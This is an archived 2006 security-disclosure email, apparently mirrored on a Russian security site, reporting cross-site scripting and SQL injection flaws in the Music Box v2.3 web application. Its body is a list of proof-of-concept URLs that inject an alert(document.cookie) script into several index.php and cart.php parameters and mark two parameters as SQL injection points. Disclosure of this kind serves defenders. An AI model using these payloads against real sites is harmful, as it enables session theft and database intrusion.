Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src / Print Next >>

Date: 24 Mar 2006 21:43:12 -0000
From: [email protected]
To: [email protected]
Subject: XSS & SQL Injection in Music Box v2.3
X-Virus-Scanned: antivirus-gw at tyumen.ru

Hello
Vulnerable: Music Box v2.3
http://www.MusicboxV2.com

Exploit :
XSS :
http://example.com/music/index.php?id='><script>alert(document.cookie)</script>

http://example.com/music/index.php?action=top&show=5&type='><script>alert(document.cookie)</script>

http://example.com/music/index.php?action=top&show='><script>alert(document.cookie)</script>&type=Artists

http://example.com/music/cart/cart.php?message1='><script>alert(document.cookie)</script>

http://example.com/music/cart/cart.php?message='><script>alert(document.cookie)</script>

SQL :
http://example.com/music/index.php?action=top&show=5&type=[SQL]

http://example.com/music/index.php?action=top&show=[SQL]&type=Artists


Discovery by Linux_Drox

http://www.lezr.com

Best Regards ,,

<< Previous INDEX Search src / Print Next >>

Партнёры:

Хостинг: